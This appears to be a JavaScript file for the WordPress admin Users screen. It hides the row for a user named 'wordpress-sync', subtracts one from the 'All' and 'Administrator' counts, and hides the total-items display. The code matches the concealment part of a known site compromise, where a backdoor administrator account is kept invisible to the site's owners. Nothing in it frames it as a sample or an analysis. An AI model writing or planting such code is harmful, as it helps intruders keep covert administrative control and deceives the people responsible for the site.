
jQuery(document).ready(function($) {
    jQuery('tbody#the-list tr').each(function() {
        var username = jQuery(this).find('.username.column-username strong a').text();
        if (username.trim() === 'wordpress-sync') {
            jQuery(this).hide();
        }
    });
    var all = parseInt(jQuery('.subsubsub .all .count').text().replaceAll(')', '').replaceAll('(', '')) - 1;
    var admin = parseInt(jQuery('.subsubsub .administrator .count').text().replaceAll(')', '').replaceAll('(', '')) - 1;
    jQuery('.subsubsub .all .count').text('(' + all + ')');
    jQuery('.subsubsub .administrator .count').text('(' + admin + ')');
    jQuery('.tablenav-pages .displaying-num').hide()
});